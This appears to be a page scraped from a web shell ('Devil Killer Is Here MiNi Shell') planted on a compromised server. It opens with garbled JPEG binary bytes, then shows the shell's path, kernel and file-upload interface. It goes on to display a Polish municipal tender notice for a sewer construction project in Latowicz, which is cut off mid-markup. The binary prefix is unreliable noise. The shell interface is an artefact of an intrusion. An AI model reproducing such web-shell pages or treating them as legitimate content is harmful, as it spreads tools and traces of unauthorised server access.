JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220429/0014228301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa kanalizacji sanitarnej w ulicy Mrozowskiej w Latowiczu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Latowicz</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 711582730</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Latowicz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-334</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@gmina-latowicz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">latowicz.samorzady.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa kanalizacji sanitarnej w ulicy Mrozowskiej w Latowiczu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9ac3c632-c7cc-11ec-b879-9a86e5ac3946</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00142283</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003476/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Budowa kanalizacji sanitarnej w ulicy Mrozowskiej w Latowiczu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">latowicz.samorzady.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Regulaminu korzystania z systemu<br/>miniPortal – dostępnego pod adresem: https://miniportal.uzp.gov.pl/WarunkiUslugi<br/>2) Instrukcji użytkownika systemu miniPortal-ePUAP – dostępnego pod adresem<br/>https://miniportal.uzp.gov.pl/Instrukcja_uzytkownika_miniPortal-ePUAP.pdf<br/>3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie niniejszego zamówienia publicznego, musi posiadać konto<br/>na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: formularz do złożenia, zmiany, wycofania oferty lub<br/>wniosku oraz do „Formularza do komunikacji.<br/>4. Wykonawca po przesłaniu oferty za pomocą formularza do złożenia lub wycofania oferty na „ekranie sukcesu” otrzyma numer<br/>oferty generowany przez ePUAP. Ten numer należy zapisać i zachować. Będzie on potrzebny w razie ewentualnego wycofania<br/>oferty.<br/>5. Wykonawca przed upływem terminu do składania ofert może wycofać ofertę za pośrednictwem Formularza do wycofania oferty<br/>dostępnego na ePUAP i udostępnionego również na mini Portalu. Sposób wycofania oferty został opisany w Instrukcji użytkownika<br/>dostępnej na mini Portalu.<br/>6. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu oraz<br/>Regulaminie ePUAP.<br/>7. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub<br/>wniosku oraz do komunikacji wynosi 150 MB. Przepustowość sieci 70Mb/s.<br/>8. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich wpływu do Zamawiającego.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych jest Wójt Gminy Latowicz ul. Rynek 6,<br/>05-334 Latowicz tel. 25 752 10 90<br/>2. W sprawach z zakresu ochrony danych osobowych mogą Państwo kontaktować się z Inspektorem Ochrony Danych pod adresem<br/>e-mail: inspektor@cbi24.pl, lub listownie: Gmina Latowicz, ul. Rynek 6, 05-334 Latowicz<br/>3. Dane osobowe będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego<br/>„Budowa(rozbudowa) sieci wodociągowej na terenie gminy Latowicz (I etap)”, Dane osobowe będą przetwarzane przez okres<br/>zgodnie z art. 78 ust. 1 i 4 ustawy z dnia z dnia 11 września 2019 r.– Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019),<br/>zwanej dalej PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas obowiązywania umowy.<br/>4. Podstawą prawną przetwarzania danych jest art. 6 ust. 1 lit. c) ww. Rozporządzenia w związku z przepisami PZP.<br/>5. Odbiorcami Pani/Pana danych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o<br/>art. 18 oraz art. 74 ust. 4 PZP.<br/>6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z PZP.<br/>7. Osoba, której dane dotyczą ma prawo do:<br/>- dostępu do treści swoich danych oraz możliwości ich poprawiania, sprostowania, ograniczenia przetwarzania,<br/>- w przypadku gdy przetwarzanie danych odbywa się z naruszeniem przepisów Rozporządzenia służy prawo wniesienia skargi do<br/>organu nadzorczego tj. Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Osobie, której dane dotyczą nie przysługuje:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e Rozporządzenia prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia;<br/>- na podstawie art. 21 Rozporządzenia prawo sprzeciwu, wobec przetwarzania danych osobowych.<br/>10. W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 Rozporządzenia, wymagałoby niewspółmiernie<br/>dużego wysiłku, Administrator może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego.<br/>11. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym<br/>mowa w art. 16 Rozporządzenia, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub<br/>Ogłoszenie nr 2022/BZP 00076538/01 z dnia 2022-03-04<br/>2022-03-04 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>konkursu ani zmianą postanowień umowy w zakresie niezgodnym z PZP.<br/>12. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 Rozporządzenia, nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia postępowania o udzielenie zamówienia publicznego.<br/>13. W przypadku danych osobowych zamieszczonych przez Administratora w Biuletynie Zamówień Publicznych, prawa, o których<br/>mowa w art. 15 i art. 16 Rozporządzenia, są wykonywane w drodze żądania skierowanego do Administratora.<br/>14. Od dnia zakończenia postępowania o udzielenie zamówienia, w przypadku gdy wniesienie żądania, o którym mowa w art. 18 ust.<br/>1 Rozporządzenia, spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole i załącznikach do protokołu,<br/>Administrator nie udostępnia tych danych zawartych w protokole i w załącznikach do protokołu, chyba że zachodzą przesłanki, o<br/>których mowa w art. 18 ust. 2 Rozporządzenia.<br/>15. W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 Rozporządzenia, wymagałoby niewspółmiernie<br/>dużego wysiłku, Administrator może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających w<br/>szczególności na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.<br/>16. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16<br/>Rozporządzenia, nie może naruszać integralności protokołu oraz jego załączników.<br/>17. Ponadto informujemy, iż w związku z przetwarzaniem Pani/Pana danych osobowych nie podlega Pan/Pani decyzjom, które się<br/>opierają wyłącznie na zautomatyzowanym przetwarzaniu, w tym profilowaniu, o czym stanowi art. 22 Rozporządzenia</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RGOŚ.271.4.A.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane w zakresie budowy kanalizacji sanitarnej grawitacyjnej i ciśnieniowej z<br/>przepompownią ścieków - w miejscowości Latowicz, ul. Mrozowska, położonych na terenie gminy Latowicz wraz z<br/>przyłączami do granicy działki, w tym kanalizacji ciśnieniowej fi 110 L= 11 m, grawitacyjnej fi 200 L= 158 mb, 1<br/>przepompownia, łącznik przyłącza ścieków fi 200 , L= 22 m wraz z odtworzeniem terenu<br/>Długość i trasę przebiegu sieci kolektorów kanalizacji ze wskazaniem długości odcinków o poszczególnych przekrojach,<br/>parametry minimalne pomp - określają mapy stanowiące załącznik do projektu wykonawczego<br/>Zamawiający z uwagi na zagospodarowanie ternu, ogranicza metody wykonania kanalizacji w formie przecisku sterowany).<br/>W ramach zamówienia należy przywrócić do stanu pierwotnego wszelkie nawierzchnie uszkodzone przy prowadzeniu robót<br/>z zastosowaniem pełnej konstrukcji ( podbudowy). Przejścia wodociągu pod drogami realizować w metoda przewiertu<br/>sterowanego w rurze osłonowej stalowej lub PEHD.<br/>Zamówienie obejmuje skompletowanie dokumentacji powykonawczej oraz wystąpienie z wnioskiem do Nadzoru<br/>Budowlanego w Mińsku Mazowieckim na podstawie udzielonego pełnomocnictwa o wydanie pozwolenia na użytkowanie<br/>wybudowanego fragmentu kanalizacji. Wykonawca uzyska na rzecz zamawiającego pozwolenie na użytkowanie<br/>wybudowanego odcinka sieci kanalizacyjnej i przedstawi je do odbioru końcowego.<br/>W przypadku kiedy wykonawca zamierza zmienić / nieumyślnie zmieni przebieg trasy kanalizacyjnej względem<br/>zatwierdzonego projektu ( załącznik do SWZ) jest zobowiązany przerwać roboty budowlane na odcinku na którym występują<br/>zmiany na swój koszt i we własnym zakresie opracować niezbędną dokumentację projektową zamienną oraz uzyskać<br/>zamienne pozwolenie na budowę i następnie kontynuować roboty. Technologia wykonania robót na przeprojektowanych<br/>odcinkach musi odpowiadać technologii robót wyznaczonej przez zamawiającego w przetargu.<br/>Przed dokonaniem planowanych zmian wykonawca zobowiązany jest uzyskać pisemną akceptację zamawiającego na<br/>zmianę przebiegu. Zmiany będą dopuszczalne tylko w szczególnie uzasadnionych przypadkach np. względami<br/>technicznymi- ominiecie niemożliwych do pokonania przeszkód. Niedopuszczalne będą zmiany mające na celu<br/>przysporzenie korzyści , w tym korzyści ekonomicznych wykonawcy.<br/>Z uwagi na przyjęty charakter wynagrodzenia ryczałtowego wykonawca w ramach niniejszego zamówienia zobowiązany jest<br/>wykonać wszystkie roboty wskazane w projekcie budowlanym z uwzględnieniem rysunków i opisów zamiennych, niniejszym<br/>opisie przedmiotu zamówienia i specyfikacji technicznej wykonania i odbioru robót budowlanych. Dokument te łącznie<br/>opisują przedmiot zamówienia i wykonawca zobowiązany jest wykonać roboty wyszczególnione chociażby w jednym z tych<br/>dokumentów. W przypadku niespójności w opisie lub ilości robót do wykonania występujących w wymienionych<br/>dokumentach nadrzędne znaczenie ma opis przedmiotu zamówienia w przetargu, a następnie projekt budowlany i<br/>specyfikacje techniczne wykonania i odbioru robót budowlanych.<br/>Pomocniczo zamawiający dołącza przedmiar robót. Przedmiar robót jest dokumentem pomocniczym, którego zadaniem jestprzekazanie przybliżonej informacji o rodzaju i wielkości robót do wykonania. Przedmiar robót z uwagi na przyjęty charakter<br/>wynagrodzenia ryczałtowego nie jest dokumentem rozliczeniowym. Rozliczeniu z zamawiającym podlegają wszystkie roboty<br/>wymienione w projekcie budowlanym z uwzględnieniem opisów i rysunków zamiennych oraz opisie przedmiotu zamówienia i<br/>specyfikacji technicznej wykonania i odbioru robót budowlanych.<br/>Wybrany wykonawca jest zobowiązany przed podpisaniem umowy dostarczyć zamawiającemu dostarczy kosztorys<br/>ofertowy. Po zakończeniu robót wykonawca przygotuje kosztorys powykonawczy lub powykonawcze zestawienie<br/>wykonanych robót z podaniem długości obmierzonych przez geodetę.<br/>Termin wykonania prac wraz z uzyskaniem pozwolenia na użytkowanie do 31.08.2022r.<br/>Przedmiot zamówienia obejmuje wykonanie w ramach ceny ofertowej wszelkich niezbędnych prac pomocniczych i<br/>towarzyszących oraz robót tymczasowych i innych, niezbędnych oraz pominiętych w wycenie i dokumentacji projektowej,<br/>jednak bez których nie będzie można ukończyć obiektu oraz przystąpić do jego użytkowania,<br/>w szczególności:<br/>1) Organizację, zagospodarowanie, utrzymanie i likwidację placu budowy oraz poniesienie kosztów z tym związanych,<br/>2) Wykonanie lub pozyskanie we własnym zakresie oraz poniesienie kosztów:<br/>- projektów organizacji ruchu na czas prowadzenia robót, uzyskanie niezbędnych opinii organów, zatwierdzenie projektu<br/>przez organ zarządzający ruchem,<br/>- innych opracowań, prac i badań wymaganych dokumentacją projektową,<br/>- dokumentacji powykonawczej z naniesionymi zmianami dokonanymi w trakcie budowy, potwierdzonymi przez projektanta,<br/>kierownika budowy.<br/>- Zorganizowanie i przeprowadzenie niezbędnych prób, pomiarów, badań i sprawdzeń, w tym inspekcji telewizyjnej , które są<br/>niezbędne do wykonania przedmiotu zamówienia oraz poniesienie kosztów z tym związanych.<br/>- zapewnienie pełnej obsługi geodezyjnej wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej<br/>3) Zabezpieczenie terenu budowy zgodnie z obowiązującymi przepisami, tj. rozporządzeniem Ministra Infrastruktury z dnia 6<br/>lutego 2003 r. w sprawie bezpieczeństwa i higieny pracy podczas wykonywania robót budowlanych (Dz.U. z 2003 r. Nr 47,<br/>poz. 401).<br/>4) Wykonanie, utrzymanie i likwidację tymczasowej organizacji ruchu, uzyskanie zgód zarządcy drogi na zajęcie pasa<br/>drogowego oraz poniesienie kosztów z tym związanych.<br/>5) Doprowadzenie wody oraz zasilania placu budowy w energię elektryczną wraz z zamontowaniem liczników zużycia wody<br/>i energii elektrycznej oraz poniesienie kosztów z tym związanych wraz z zapłatą za energię, wodę i inne media zużyte w<br/>trakcie budowy oraz wykonywanie prób i prób końcowych.<br/>6) Obsługa archeologiczna i konserwatorska w przypadku wystąpienia sytuacji dla której taka obsługa jest wymagana.<br/>7) Geodezyjne wytyczenie w terenie tras rurociągów, miejsc posadowienia obiektów i armatury, kolizji z istniejącym<br/>uzbrojeniem podziemnym,<br/>8) Wykonanie odwodnienia wykopów.<br/>9) Uzyskanie zgody dostawców mediów wraz z poniesieniem opłat za: pobór energii elektrycznej dla potrzeb prowadzonej<br/>budowy, wody do celów socjalnych i technologicznych, zrzut wód z odwadniania wykopów, wodę zużytą do płukania<br/>rurociągów, ścieki z zaplecza budowy itp.<br/>10) Zapewnienie i zabezpieczenie dostępu do posesji w miejscach prowadzenia robót.<br/>11) Zabezpieczenie istniejącego uzbrojenia podziemnego kolidującego z projektowanymi przewodami, a w miejscach<br/>występowania kolizji prowadzenie prac pod nadzorem eksploatatora kolidującej sieci oraz ponoszenie kosztów<br/>ewentualnego nadzoru.<br/>12) Zabezpieczenie mienia Wykonawcy zgromadzonego w miejscu składowania i na terenie wykonywanych robót.<br/>13) Wykonanie włączeń nowo wybudowanych sieci do istniejących sieci gminnych<br/>14) Wykonanie prób i badań sieci wodociągowej wynikających z odpowiednich przepisów, w uzgodnieniu z inspektorem<br/>nadzoru.<br/>15) Wywóz nadmiaru ziemi lub dowóz ziemi wraz z jej zakupem , jeżeli taka konieczność wystąpi, ewentualna wymiana<br/>gruntów lub ich zagęszczenie .<br/>16) Odtworzenie do stanu poprzedniego terenu budowy, w tym nawierzchni drogowych po robotach ziemnych pod<br/>nadzorem zarządcy drogi, jeżeli taka konieczność wystąpi<br/>17) Uporządkowanie po zakończeniu robót terenu budowy.<br/>18) Przygotowanie dokumentacji powykonawczej w rozumieniu przepisów ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (<br/>Dz. U. z 2020 r., poz. 1333 z późn. zm.), w tym: protokołów odbiorów technicznych, instrukcji obsługi, protokołów badań,<br/>aprobat technicznych, atestów, deklaracji zgodności itp. i uzyskanie prawomocnej decyzji pozwolenia na użytkowanie lub<br/>skuteczne zgłoszenie zakończenia zadania w nadzorze budowlanym w imieniu i na rzecz Inwestora<br/>19) Utrzymanie terenu budowy w stanie wolnym od przeszkód komunikacyjnych oraz usuwanie na bieżąco zbędnych<br/>materiałów, odpadów i śmieci oraz poniesienie kosztów z tym związanych.<br/>Roboty składające się na przedmiot zamówienia muszą być wykonane zgodnie z obowiązującymi przepisami (w<br/>szczególności ustawy prawo budowlane, przepisami bhp i p.poż oraz branżowymi), jak również zgodnie z zasadami wiedzy<br/>technicznej, a także z należytą starannością, zachowaniem właściwej organizacji pracy i zapewnieniem dobrej jakości.<br/>Materiały stosowane przez Wykonawcę podczas realizacji przedmiotu umowy powinny być fabrycznie nowe i odpowiadać,<br/>co do jakości, wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie, zgodnie z art. 10 ustawy z dnia 7<br/>lipca 1994 roku Prawo budowlane (zwanej dalej „ustawą prawo budowlane” lub „prawem budowlanym”, oraz jakościowym i<br/>gatunkowym wymaganiom określonym w opisie przedmiotu zamówienia.<br/>1. Wszystkie użyte materiały, wyroby oraz urządzenia muszą mieć aktualne dokumenty (atesty, aprobaty i deklaracje zgodności) dopuszczające do stosowania w budownictwie, zgodnie z przepisami obowiązującymi w tym zakresie.<br/>2. Wykonawca robót ponosi odpowiedzialność za jakość wykonywanych robót oraz zastosowanych materiałów.<br/>3. Na każde żądanie Inwestora, Wykonawca zobowiązany jest okazać, w stosunku do wskazanych materiałów (krajowe<br/>deklaracje zgodności), aprobatę techniczną oraz wymagane atesty (kartę charakterystyki), krajową ocenę techniczną<br/>wydaną przez upoważnioną instytucję krajową. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 